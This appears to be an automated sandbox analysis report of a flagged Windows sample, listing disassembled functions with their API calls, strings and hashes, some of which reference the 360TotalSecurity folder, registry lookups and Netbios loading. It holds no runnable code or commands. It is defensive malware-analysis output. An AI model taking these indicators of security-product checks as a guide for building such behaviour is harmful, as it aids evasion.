
Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: std::ios_base::_$Ios_base_dtor$Tidy
String ID: ' is not a number.
API String ID: 1660919132-698141950
Opcode ID: 4c65b3d8a94d71f396607c29b69c666f2393f0840463bcdab7b7a05c3bfc3cfe
Instruction ID: 127e038c3c670db67ceb8761e47593868cba54f79e17a5f4c7929c39934a4a58
Opcode Fuzzy Hash: 4c65b3d8a94d71f396607c29b69c666f2393f0840463bcdab7b7a05c3bfc3cfe
Instruction Fuzzy Hash: 8B6181B1D002589FCB10DFA9C941BDDFBB4AF19304F14816FE90967242D7B89A48CBA5

Function 004586E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 00458871

Strings

%, xrefs: 004587F9
+, xrefs: 00458807

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: swprintf
String ID: %$+
API String ID: 233258989-2626897407
Opcode ID: 627356d71b5e65f04b9fba9a5f5aa2c0f8e03a6f391fd59ea5aead6830c7295b
Instruction ID: ca216fb2ccd0806d6bb8efb6b476fbe039f35d0fd5b0fbaa41d4beba8469aabd
Opcode Fuzzy Hash: 627356d71b5e65f04b9fba9a5f5aa2c0f8e03a6f391fd59ea5aead6830c7295b
Instruction Fuzzy Hash: BC518C73E043005AD715AA18CC847DB7BE4EB45382F30195EED81A3393EE6D88498BCE

Function 004588B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 00458A31

Strings

+, xrefs: 004589C7
%, xrefs: 004589B9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: swprintf
String ID: %$+
API String ID: 233258989-2626897407
Opcode ID: bd9d978fbc67a3f7114ba393e284419a1a3adbd57fa90a57254f2341b8e756fd
Instruction ID: 229c02cc651a8cb155adca296aef01cde620da0f872926c806c2b37376d29a85
Opcode Fuzzy Hash: bd9d978fbc67a3f7114ba393e284419a1a3adbd57fa90a57254f2341b8e756fd
Instruction Fuzzy Hash: 0E516FB2A083409BD7159A18C8847EB7BE4FB45341F20495EFD81A3393EF6D8C49879B

Function 00462240 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000401,00000000,00000000), ref: 00462334
PostMessageW.USER32(00000000,00000403,00000000,00000000), ref: 0046234E

Strings

T9N, xrefs: 0046230E

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID: T9N
API String ID: 410705778-185908819
Opcode ID: 864143ef437329f9c4ced060eda4cbc7039652118eb00f0be0ed5f6e2f024b29
Instruction ID: e620361aaaec6b45d06e3cf0956ed295eeddacf8bf0858373358f6c422f466ef
Opcode Fuzzy Hash: 864143ef437329f9c4ced060eda4cbc7039652118eb00f0be0ed5f6e2f024b29
Instruction Fuzzy Hash: 97419EB1600A04AFD714CF69CC91F5AB3A4FB85320F10876EE9259B3E1E775E901CB98

Function 0047B3B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047B41E
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,C1DE166F,?,00000000), ref: 0047B42F

Strings

\360TotalSecurity, xrefs: 0047B492

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FolderPath_memset
String ID: \360TotalSecurity
API String ID: 3318179493-2332581644
Opcode ID: f6adcd28df06bed92cdfd732060156ac89a389cc2101eed53709f0157deedd95
Instruction ID: a6db65f835360d9414d93d9fbf408dda19f3d2ea05ca5a202b5f1d7d69fbe50a
Opcode Fuzzy Hash: f6adcd28df06bed92cdfd732060156ac89a389cc2101eed53709f0157deedd95
Instruction Fuzzy Hash: 6D41A3B1514300ABD710EF29E885BAFB7D8EF88318F444A2FF44997291D73CA94487DA

Function 0047C060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047C0B1
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,C1DE166F), ref: 0047C0C3

Strings

\360TotalSecurity, xrefs: 0047C123

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FolderPath_memset
String ID: \360TotalSecurity
API String ID: 3318179493-2332581644
Opcode ID: 206c846eed456e622a80b911157f6773412a33d1273f63c3d9b5ed6e7ae78139
Instruction ID: 33d1853786ce610a4019087d8bcb722d3f345c4a8efe477e8a07a1bb4625ea7b
Opcode Fuzzy Hash: 206c846eed456e622a80b911157f6773412a33d1273f63c3d9b5ed6e7ae78139
Instruction Fuzzy Hash: D131A4B16143409BD310EF25D8C5BABB7E9EF88714F80493FF44997291DB3C99048B9A

Function 00468590 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

_wcsrchr.LIBCMT ref: 00468627

Strings

T9N, xrefs: 004685E7
T9N, xrefs: 004685CB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _wcsrchr
String ID: T9N$T9N
API String ID: 1752292252-1430650303
Opcode ID: 4f867a5eacb5ccc313b5dd05eec72df660476cc185299ef4c483ceed8b102571
Instruction ID: 3907a6aad81c414dc0ec16ccaffdfb23846f3fb0f01909b07169201c7ac1546f
Opcode Fuzzy Hash: 4f867a5eacb5ccc313b5dd05eec72df660476cc185299ef4c483ceed8b102571
Instruction Fuzzy Hash: F33173B1A00605AFDB00DF6DCC41B9EF7E5EF94320F15866AE814DB392DB759A008B95

Function 0044715B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0044716B

Part of subcall function 0048F048: RaiseException.KERNEL32(?,00000000,P0@,?,?,?,?,?,00403050,?,004CD820,?), ref: 0048F08A

__CxxThrowException@8.LIBCMT ref: 004471F8

Strings

list<T> too long, xrefs: 004471B6

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: list<T> too long
API String ID: 3476068407-4027344264
Opcode ID: b13aebad103fc50df3bd6ccaef2c1fbfaafbfa42919a8c8e8e8f85c485cb9631
Instruction ID: cbc7e370252147bdf0a1f41df0aab88ef1fcd240bad2a8028eeba23de2053fe5
Opcode Fuzzy Hash: b13aebad103fc50df3bd6ccaef2c1fbfaafbfa42919a8c8e8e8f85c485cb9631
Instruction Fuzzy Hash: 8C11C6B2D043189BCB10EFD4C845BDEB7F4EB08714F100A6AF901B76C1D7B8554887A9

Function 0044E6E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0044E754

Part of subcall function 0044E9D0: __CxxThrowException@8.LIBCMT ref: 0044E9F0

Strings

in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing, xrefs: 0044E724
in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer, xrefs: 0044E764

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw_malloc
String ID: in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer$in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing
API String ID: 3476970888-1516562270
Opcode ID: 92b539ca3e0c5f6cc4ab3c9f73a5a429e92e7529c36422e3158b58293769a5b0
Instruction ID: 6f7c2c4555c5b928909773d5385ec3f0d00b2ad257d6945f7a4d35fc53a13465
Opcode Fuzzy Hash: 92b539ca3e0c5f6cc4ab3c9f73a5a429e92e7529c36422e3158b58293769a5b0
Instruction Fuzzy Hash: 0821C271D14208ABDB10EFA5C881FDEB7FCEB09714F10416FE855A3281D77866088BB5

Function 0046C8D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046C92C
SHGetFileInfoW.SHELL32(dummy,00000010,00000000,000002B4,00000111), ref: 0046C94C

Strings

dummy, xrefs: 0046C947

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileInfo_memset
String ID: dummy
API String ID: 2638500827-1341452863
Opcode ID: 39584f37234f12ceba60b33f0966fe5be9a25adb699d324d2cd6eaae490f2d32
Instruction ID: 34207cb54232210df3e410c3426895dd0293e4b59b264748dbbebd727176387b
Opcode Fuzzy Hash: 39584f37234f12ceba60b33f0966fe5be9a25adb699d324d2cd6eaae490f2d32
Instruction Fuzzy Hash: 7F11A770A0030CABDF50EF64DC46BAE73E49B05304F40459EE90D9B382EB756A18DF59

Function 0047C230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0047C266
GetCurrentProcessId.KERNEL32(C1DE166F,?,?,?), ref: 0047C272

Part of subcall function 0047C190: RegOpenKeyExW.ADVAPI32 ref: 0047C1B0
Part of subcall function 0047C190: RegQueryValueExW.ADVAPI32(?,Path,00000000), ref: 0047C1E0
Part of subcall function 0047C190: RegCloseKey.ADVAPI32 ref: 0047C1EA

Strings

PrN, xrefs: 0047C240

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseCurrentOpenProcessQueryValue__wcsnicmp
String ID: PrN
API String ID: 4025261707-529563713
Opcode ID: 9c82e9ac8792b6d4bb54f02041db6a3e653e0b47daa911781d39231e6839d583
Instruction ID: 06d61b6dee211bcea7aa0e6dc66a31dceec7f1586715560bfa64037558db7496
Opcode Fuzzy Hash: 9c82e9ac8792b6d4bb54f02041db6a3e653e0b47daa911781d39231e6839d583
Instruction Fuzzy Hash: AA01A7A2E0014056E61477F6BCC569B23549BD0376B10C4BFFA0589253F728844197AD

Function 0044E640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0044E67A

Strings

D, xrefs: 0044E65E, 0044E6C3
in Json::Value::duplicateStringValue(): Failed to allocate string value buffer, xrefs: 0044E68A

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _malloc
String ID: D$in Json::Value::duplicateStringValue(): Failed to allocate string value buffer
API String ID: 1579825452-1789853658
Opcode ID: 75298489d849f845ba64b3fc91c1800b282d06b8886ee4aea7138ed160373318
Instruction ID: c6d8451d7cf46d9193f8aafad735d3d9bfb55c423160826813fa3bd8bb0dcf15
Opcode Fuzzy Hash: 75298489d849f845ba64b3fc91c1800b282d06b8886ee4aea7138ed160373318
Instruction Fuzzy Hash: A401C872905258ABD710DB59C901B9EBBECEB49720F10026FE414A33C1EB79990487E9

Function 004450FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00445118
_memcpy_s.LIBCMT ref: 00445124

Part of subcall function 00444FC0: __recalloc.LIBCMT ref: 00444FCD

Strings

lLD, xrefs: 0044511D, 00445121

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memcpy_s$__recalloc
String ID: lLD
API String ID: 2145447247-2482073302
Opcode ID: 4e402050d60fa53ab59fb9c3e7f3b991e9012a59e0bf476d615b3d76d532f138
Instruction ID: dc0b7c8e2f341b50d16d268e7a72cd5438395d84ebd79ccdd52b762c76d513bc
Opcode Fuzzy Hash: 4e402050d60fa53ab59fb9c3e7f3b991e9012a59e0bf476d615b3d76d532f138
Instruction Fuzzy Hash: 320152729002099BDB10DFD6DC82AFFB778EF44314F14451FEE0067202DA3DA9118BA5

Function 0049D0A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0048EE8C: __getptd.LIBCMT ref: 0048EE92
Part of subcall function 0048EE8C: __getptd.LIBCMT ref: 0048EEA2

__getptd.LIBCMT ref: 0049D0B5

Part of subcall function 00493E12: __getptd_noexit.LIBCMT ref: 00493E15
Part of subcall function 00493E12: __amsg_exit.LIBCMT ref: 00493E22

__getptd.LIBCMT ref: 0049D0C3

Strings

csm, xrefs: 0049D0D1

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 53394e8b7856a1e33457b78ee82c96252d9bbaa38ebc9adb83865452d3924fc1
Instruction ID: c6767626c0c23369a138158026500a58e08acf6f5eca800900730eb26fc50b5d
Opcode Fuzzy Hash: 53394e8b7856a1e33457b78ee82c96252d9bbaa38ebc9adb83865452d3924fc1
Instruction Fuzzy Hash: B5014B36C002058ECF38AF66C542EAEBBB5AF1A315F24483FE44156292CB388D91DB59

Function 0047B150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

wnsprintfW.SHLWAPI ref: 0047B197
VerQueryValueW.VERSION(00000000,?), ref: 0047B1AE

Strings

%s\ProductName, xrefs: 0047B188

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: QueryValuewnsprintf
String ID: %s\ProductName
API String ID: 2804438540-410896979
Opcode ID: ca7cfc3a0a03f39111e3ab80239189db2d99a82e110005c62806bc4440bf85b4
Instruction ID: ed546fd2381a45e3a79e5d9aa6ac9d7ef4ec7f699e76b338acbeee4f6108e0dc
Opcode Fuzzy Hash: ca7cfc3a0a03f39111e3ab80239189db2d99a82e110005c62806bc4440bf85b4
Instruction Fuzzy Hash: 16F096F55103006FD260E724C84ABAF73E4EF88700F904E1DA5AA86192DA786458CB86

Function 004A9440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,Netbios), ref: 004A9463

Strings

Netapi32.dll, xrefs: 004A944C
Netbios, xrefs: 004A945D

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc
